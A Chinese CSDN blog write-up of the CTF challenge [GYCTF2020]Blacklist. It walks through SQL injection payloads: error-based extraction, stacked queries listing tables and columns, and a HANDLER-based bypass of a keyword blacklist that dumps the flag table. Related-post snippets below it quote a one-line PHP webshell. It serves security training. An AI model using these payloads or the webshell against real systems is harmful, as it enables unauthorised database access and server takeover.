[GYCTF2020]Blacklist

最新推荐文章于 2023-11-07 14:38:12 发布
最新推荐文章于 2023-11-07 14:38:12 发布
阅读量301 收藏 1
点赞数 1
分类专栏: CTF题目 # buu 文章标签: mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kuller_Yan/article/details/109222998
版权

[GYCTF2020]Blacklist

先打开url 题目名字黑名单:尝试正常注入流程发现有过滤提示

set|prepare|alter|rename|select|update|delete|drop|insert|where

看到界面和过滤信息感觉很像2019年强网杯一道题好像是叫随便注;
我做题时先用报错注入爆除了库名supersqli

1'or(extractvalue(1,concat(0x7e,database())))#

后来尝试堆叠注入做题:

-1';use supersqli;show tables #

爆出表名:FlagHere,words

1'; show columns from FlagHere;#

爆出列名:flag,varchar(100),NO

做到这里就不会做了,强网杯那道题用字符串拼接payload是:

-1';use information_schema;set @sql=concat('s','elect', 'column_name from columns wher','e table_name="1919810931114514"')PREPARE stmt1 FROM @sql;EXECUTE stmt1;#

但是这题过滤了set,prepare过滤更狠,查了一下发现个东西:

通过HANDLER tbl_name OPEN打开一张表,无返回结果,
实际上我们在这里声明了一个名为tb1_name的句柄。

通过HANDLER tbl_name READ FIRST获取句柄的第一行,
通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。

通过HANDLER tbl_name CLOSE来关闭打开的句柄。

最后构建payload:

1';handler FlagHere open;handler FlagHere read first;Handler FlagHere close;#
kuller_Yan
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
blacklist-jee
07-08
blacklist-jee 您将需要 Java8 来编译和运行。 检查您的应用程序是否正在运行在安装了 git、java8、docker 和 maven 的本地 Ubuntu VM 中进行开发先决条件:已安装 VirtualBox 和 Vagrant。 从该项目的根目录初始化...
Mikrotik-Blacklist
03-05
/tool fetch address=raw.githubusercontent.com host=raw.githubusercontent.com mode=https src-path=stathis/Mikrotik-Blacklist/master/a_blacklist_file.rsc/import a_blacklist_File.rsc其他资讯此回购应该...
[GYCTF2020]Blacklist 1
m0_73728268的博客
03-15 372
2.继续构造payload,1’ or 1=1#,确定了闭合方式。使用接下来的语句 1’;1.感觉像是一种注入,blacklist黑名单绕过。更具一系列操作可以判断出闭合方式为。handler函数运用。
[GYCTF2020]Blacklist1
最新发布
whale_waves的博客
11-07 97
其实这一题我看到的第一反应是基于布尔的盲注 原因: 没有禁用ascii substr 之类的, 并且输入1和0时输入1会有回显0不会 这里将预编译注入、联合注入、报错注入、都过滤的干净 通过它给出的黑名单考虑可用的命令 可尝试的 堆叠注入例如show database和show tables handler命令 基于布尔的盲注(通过1^0^1,真假真为假,1^1^1,真真真为真,来做手段) !!这里后面会排除掉,应为后面才想起来select被禁了,但是查询需要用
页面跳转到BackURL功能(基于struts2实现)
墨竹
11-02 8846
页面跳转到BackURL功能(基于struts2实现) 应用场景: 在查询用户列表/user!list.action时,点击新增用户,将跳转到/user!input.action 现在需要新增成功后跳转到/user!list.action 常规的做法是在UserAction里定义一个Result=RELOAD, location = "user!list.action",
android_system_blacklist_android_msm8610_
10-03
在Android系统中,"android_system_blacklist_android_msm8610_"可能指的是针对特定硬件平台MSM8610的黑名单配置或者安全更新。MSM8610是高通公司生产的一款移动处理器,主要面向中低端智能手机和平板电脑市场。这个...
Quick-Blacklist
06-15
快速黑名单 一个轻量级实用程序,用于将玩家和库存中的项目列入黑名单。
cpf_blacklist
02-08
项目名为"cpf_blacklist-master"暗示这是一个主分支或主要版本,可能包含源代码、测试文件、文档和其他资源。 以下是围绕这个主题可能涉及的一些详细知识点: 1. **字符串操作**:在Python中,CPF号码通常以特定...
具备白名单、黑名单的Filter基类扩展
lmb55的专栏
02-06 4225
问题引入:比如定义了一个mapping, <servlet-mapping> <servlet-name>html_dispatcher</servlet-name> <url-pattern>*.html</url-pattern> </servlet-mapping> 就是说所有的.html请求都会由html_dispatcher来处理,但现在的问题是: 我希望
ROSE笔记-[GYCTF2020]Blacklist 1-WP
居上
11-13 338
[GYCTF2020]Blacklist 1 输入单引号,报错,sql注入. 1' or 1=1 order by 2#没有报错 1' or 1=1 order by 3#报错 先尝试联合查询 1' or 1=1 union select 1,2 发现过滤了大部分关键字 1' or 1=1;show databases;#查库 1' or 1=1;show tables;#查表 1' or 1=1;desc FlagHere;#查字段 HANDLER … OPEN语句打开一个表,使其可以使用后
网络安全笔记-WebShell与文件上传
L120305q的博客
08-17 2843
网络安全笔记-WebShell与文件上传
Nginx#Http协议状态码含义
kakaops_qing的博客
10-08 1657
http协议状态码
文件上传漏洞—蚁剑连接地址错误、一句话木马php语法错误
热门推荐
Xionghuimin的博客
06-02 3万+
题目 第一步:把写有<?php phpinfo(); ?>代码的txt文件改文件名为infor.jpg,上传过程中用burpsuite抓包修改为infor.php。提示上传成功后在url中可以打开 第二步:把写有 <? php phpinfo(); @eval($_POST['shell']); ?> 代码的txt文件改文件名为infors.jpg,上传过程中用burpsuite抓包修改为infors.php。提示上传成功后在url中打开但是什么也没有显示,蚁剑也连接不上。
蚁剑出现的问题和解决方法2
彼岸花苏陌的博客
03-10 5342
蚁剑出现Unable to resolve domain name from URL的解决方法 蚁剑测试连接显示成功,添加却显示 Unable to resolve domain name from URL 解决方法: 网上查找后无果,遂发现 忘记加http://了 在你的url前加个http://即可正常连接 ...
blacklist.conf
09-06
blacklist.conf是一个配置文件,用于在Nginx服务器中设置黑名单。可以通过在nginx.conf文件中添加`include /usr/local/nginx/conf/blacklist.conf;`来引入blacklist.conf文件。 在blacklist.conf文件的最后部分,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值